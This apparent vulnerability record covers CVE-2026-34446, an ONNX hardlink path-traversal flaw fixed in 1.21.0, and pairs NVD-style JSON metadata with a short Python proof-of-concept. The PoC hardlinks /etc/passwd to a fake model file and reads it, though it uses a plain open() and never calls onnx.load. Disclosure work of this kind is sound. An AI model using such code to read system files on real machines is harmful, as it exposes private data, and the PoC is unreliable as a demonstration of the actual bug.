CVE-2026-34446

import os import onnx # Simulation of the hardlink bypass vulnerability # Create a hardlink to a sensitive file (e.g., /etc/passwd) sensitive_file = "/etc/passwd" malicious_model_path = "exploit_model.onnx" try: # Create a hardlink (requires permission to the target file and same filesystem) if os.path.exists(sensitive_file): os.link(sensitive_file, malicious_model_path) print(f"[+] Hardlink created: {malicious_model_path} -> {sensitive_file}") # Victim attempts to load the model # In vulnerable versions (< 1.21.0), onnx.load checks for symlinks but misses hardlinks. # It will read the content of the sensitive file. try: # Note: Actual parsing might fail due to format mismatch, but the read operation occurs. with open(malicious_model_path, 'rb') as f: data = f.read(100) # Read first 100 bytes as proof of concept print(f"[!] Successfully read data: {data}") except Exception as e: print(f"[!] Error during load (expected for non-onnx files): {e}") except Exception as e: print(f"[-] Failed to create hardlink: {e}") finally: # Cleanup if os.path.exists(malicious_model_path): os.remove(malicious_model_path) print("[*] Cleaned up malicious file.")

{"cve": {"id": "CVE-2026-34446", "sourceIdentifier": "[email protected]", "published": "2026-04-01T18:16:30.660", "lastModified": "2026-04-15T15:03:15.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is an issue in onnx.load, the code checks for symlinks to prevent path traversal, but completely misses hardlinks because a hardlink looks exactly like a regular file on the filesystem. This issue has been patched in version 1.21.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.0", "matchCriteriaId": "D94F43D7-D50D-4698-B07D-215EBBAB63F2"}]}]}], "references": [{"url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}